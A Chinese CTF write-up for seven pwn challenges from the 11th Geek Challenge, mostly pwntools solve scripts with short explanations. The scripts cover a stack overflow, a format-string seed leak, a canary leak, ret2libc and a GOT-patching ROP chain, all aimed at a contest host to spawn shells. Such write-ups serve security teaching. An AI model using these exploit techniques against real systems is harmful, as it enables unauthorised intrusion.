
第十一届极客大挑战


现在转行还来得及吗?

这里特别感谢C1heck0ut师傅,师傅TQL,不嫌弃我菜,我给师傅拖后腿了。

pwn1:数学咋样?

话不多说,看到提示下载pwntools和ubuntu,直接手撕20个加法

# Connect to the pwn1 service; the 20 addition prompts were answered by hand.
nc 81.69.0.47 1111

得到flag

pwn2:liuzhuang-secret

栈溢出,程序有system(bin_sh)

#! /usr/bin/env python
# Solve script for pwn2 (liuzhuang-secret): a plain stack overflow that
# overwrites the saved return address with the address of the binary's own
# system(bin_sh) call.
# NOTE(review): 'a'*N (str) + p64() (bytes) only concatenates under Python 2;
# on Python 3 pwntools the padding must be b'a'.

from pwn import *
#sh=process('./pwn00')
sh=remote('81.69.0.47',1000)      # challenge service; swap for process() to run locally

# Fixed address of the in-binary system(bin_sh) call (presumes the binary is not PIE).
system_addr=0x000000000040079B
# 0x70 + 8 bytes reach the return address (presumably buffer then saved rbp),
# then the new return address.
payload='a'*0x70+'a'*8+p64(system_addr)
sh.sendline(payload)

sh.interactive()

pwn3:fmt

格式化字符串漏洞:先用它泄露随机数种子,再用同一 libc 的 srand/rand 复现序列,猜对16次即可 getshell。

#! /usr/bin/env python
# Solve script for pwn3 (fmt): a format-string read leaks the program's
# random seed from .bss, then libc's srand()/rand() are replayed via ctypes
# so that all 16 guesses match.
# NOTE(review): '%9$s'+... (str) + p64() (bytes) only concatenates under
# Python 2; on Python 3 pwntools the literals must be bytes.
from pwn import *
from ctypes import *

#sh=process('./fmt')
sh=remote('81.69.0.47',2222)
context.log_level='debug'
# Host libc, used only to replay srand()/rand().
# NOTE(review): the replayed sequence matches only if the host libc's rand()
# agrees with the target's — confirm against the challenge's libc.
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
bss_addr=0x40409C                 # .bss location the seed is read from

# '%9$s' dereferences the 9th format argument as a string; the 4 filler
# bytes pad the specifier to 8 bytes so p64(bss_addr) lands on an 8-byte
# boundary (the slot index is specific to this binary).
payload='%9$s'+'a'*4+p64(bss_addr)
sh.recvuntil('\n')
sh.sendline(payload)

# %s prints the seed bytes; only 4 are taken and zero-extended to 8 for u64.
seed=u64(sh.recv(4).ljust(8,'\x00'))
sh.success('seed : ' +hex(seed))

libc.srand(seed)

# Answer each of the 16 rounds with the next rand() value.
for i in range(16):
    sleep(1)                      # presumably so each answer is read as a separate input
    sh.sendline(str(libc.rand()))

#gdb.attach(sh)
sh.interactive()

pwn4:runcode

写个c就好

#include<stdio.h>
#include<unistd.h>

/*
 * Solution for pwn4 (runcode): the challenge compiles and runs submitted C,
 * so the program simply exec's cat on the flag file.
 */
int main(int arg, char **args)
{
/* argv[1] is an empty string: cat reports it on stderr as missing and still
   prints /home/ctf/flag afterwards, so it could be dropped. */
char *argv[]={"cat","","/home/ctf/flag", NULL};

/* envp[0] == 0 already terminates the list, so cat runs with an empty environment. */
char *envp[]={0,NULL};
execve("/bin/cat",argv,envp);
/* execve only returns on failure; no error is reported and no value is returned here. */
}

pwn5:baby_canary

两次输入的机会:第一次覆盖 canary 的最后一个字节来泄露 canary,第二次栈溢出跳到后门函数。

#! /usr/bin/env python
# Solve script for pwn5 (baby_canary): the first input overwrites the low
# byte of the stack canary so the following output leaks it; the second
# input overflows past the (restored) canary into a ROP chain calling
# system("/bin/sh").
# NOTE(review): str padding + p64() bytes only concatenates under Python 2.
from pwn import *

#sh=process('./baby_canary')
sh=remote('81.69.0.47',3333)
elf=ELF('./baby_canary')          # local copy of the binary, used for the PLT lookup
#context.log_level='debug'

bin_sh=0x00000000004008ED         # presumably a "/bin/sh" string inside the binary
system_plt=elf.plt['system']
pop_rdi=0x0000000000400873        # pop rdi; ret — loads the first argument

sh.recvuntil('may be you know it,plz tell me.\n')
# 0x67 'a' + 'b' fill up to the canary; the trailing 'a' (0x61) replaces its
# low byte, which on glibc is 0x00 and would otherwise terminate the leak.
payload='a'*0x67+'b'+'a'
sh.send(payload)                  # send(), not sendline(): no newline byte after the overwrite
sh.recvuntil('b')
# Read back the 8 canary bytes and subtract the 0x61 written into the low byte.
canary=u64(sh.recv(8))-0x61
sh.success('canary : ' +hex(canary))

sleep(0.5)
# 0x68 bytes to the canary, the real canary, p64(0) for saved rbp,
# then pop rdi; "/bin/sh"; system@plt.
payload='a'*0x68+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system_plt)
sh.sendline(payload)

sh.interactive()

pwn6:pwn111

ROP利用,简单题

#! /usr/bin/env python
# Solve script for pwn6 (pwn111): two-stage ret2libc — a write() ROP chain
# leaks write's GOT entry and returns to main, the libc base is derived from
# it, and a second overflow returns into a one_gadget.
# NOTE(review): str padding + p64() bytes only concatenates under Python 2.
from pwn import *

#sh=process('./pwn111')
sh=remote('81.69.0.47',1122)
elf=ELF('./pwn111')
libc=ELF('./libc')                # libc shipped with the challenge; the offsets below depend on it
context.log_level='debug'

pop_rdi=0x0000000000401233        # pop rdi; ret
pop_rsi_r15=0x0000000000401231    # pop rsi; pop r15; ret
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x0000000000401146      # return here after the leak to get a second overflow

sh.recvuntil('please input: ')
# Stage 1: 0x80 + 8 bytes reach the return address, then
# write(1, write_got, rdx) followed by a return to main. The chain does not
# set rdx, so the byte count written is whatever rdx holds at that point.
payload='a'*0x80+'a'*8+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main_addr)
sh.sendline(payload)

# Only the low 6 bytes of a user-space address are non-zero; pad to 8 for u64.
write_addr=u64(sh.recv(6).ljust(8,'\x00'))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
sh.success('llibc_base : ' +hex(libc_base))
one_gadget=libc_base+0x4527a      # one_gadget offset for this libc (presumably from the one_gadget tool)
sh.success('one_gadget : ' +hex(one_gadget))

# Stage 2: same overflow, return straight into the one_gadget.
payload='a'*0x80+'a'*8+p64(one_gadget)
sh.sendline(payload)

sh.interactive()

pwn7:pwn222

这里还是参考了riChar师傅的wp才弄懂,太菜了。

具体思路就是利用我们找到的这个 add gadget,把 read 的 GOT 表项改成 write 的地址,然后调用它把 GOT 中的地址泄露出来,再用同一个 gadget 把该表项改回 read,之后跳回 _start 函数重新执行,最后就是 one_gadget 一把梭了。

; The add_ret gadget used by the script below (0x40112c): adds ebx to the
; 32-bit value at rbp-0x3d. With rbp = read_got+0x3d it patches read's GOT
; entry in place.
add dword ptr [rbp - 0x3d], ebx ; nop ; ret
#! /usr/bin/env python
# Solve script for pwn7 (pwn222): the `add dword ptr [rbp-0x3d], ebx` gadget
# (add_ret) adds 0x60 to read's GOT entry so that read@plt calls write,
# that call leaks the GOT entry, the same gadget subtracts 0x60 again, and
# execution restarts at _start for a second overflow into a one_gadget
# (technique credited to riChar's write-up, as noted above).
# NOTE(review): str padding + p64() bytes only concatenates under Python 2.

from pwn import *

#sh=process('./pwn222')
sh=remote('81.69.0.47',2212)
elf=ELF('./pwn222')
libc=ELF('./libc')                # libc shipped with the challenge; 0x60 and the one_gadget offset depend on it
context.log_level='debug'

read_got=elf.got['read']
read_plt=elf.plt['read']
pop_rbx_rbp_r12_r13_r14_r15_ret=0x000000000040122A   # pop rbx; pop rbp; pop r12..r15; ret
pop_rsi_r15_ret=0x0000000000401231
pop_rdi_ret=0x0000000000401233
add_ret=0x000000000040112c        # add dword ptr [rbp-0x3d], ebx ; nop ; ret

# 0x28 bytes reach the return address.
payload='a'*0x28
# ebx = 0x60, rbp = read_got+0x3d: the add gadget then does *(read_got) += 0x60,
# i.e. read's GOT entry now holds write's address (0x60 is the read->write
# distance in this libc; confirm with libc.symbols). r12..r15 are don't-cares.
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0x60)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
# read@plt now resolves to write: write(0, read_got, rdx) leaks the patched
# GOT entry. fd 0 presumably works for output because the remote service's
# stdin and stdout are the same socket; rdx is whatever the program left in it.
payload+=p64(pop_rdi_ret)
payload+=p64(0)
payload+=p64(pop_rsi_r15_ret)
payload+=p64(read_got)
payload+=p64(0)
payload+=p64(read_plt)
# Undo the patch: ebx = 0xFFFFFFA0 (low 32 bits of the value) is -0x60, so
# the gadget restores read's original GOT entry.
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0xFFFFFFFFFFFFFFA0)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
# Jump back to (presumably) _start to rerun the program for a second overflow.
payload+=p64(0x0000000000401060)
sh.sendline(payload)

# The leaked 8 bytes are the GOT entry as it was during the write call, i.e. write's address.
write_addr=u64(sh.recv(8))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
one_gadget=libc_base+0x4527a      # one_gadget offset for this libc

# Second run: same 0x28-byte overflow, return straight into the one_gadget.
payload2='a'*0x28+p64(one_gadget)
sh.sendline(payload2)
sh.interactive()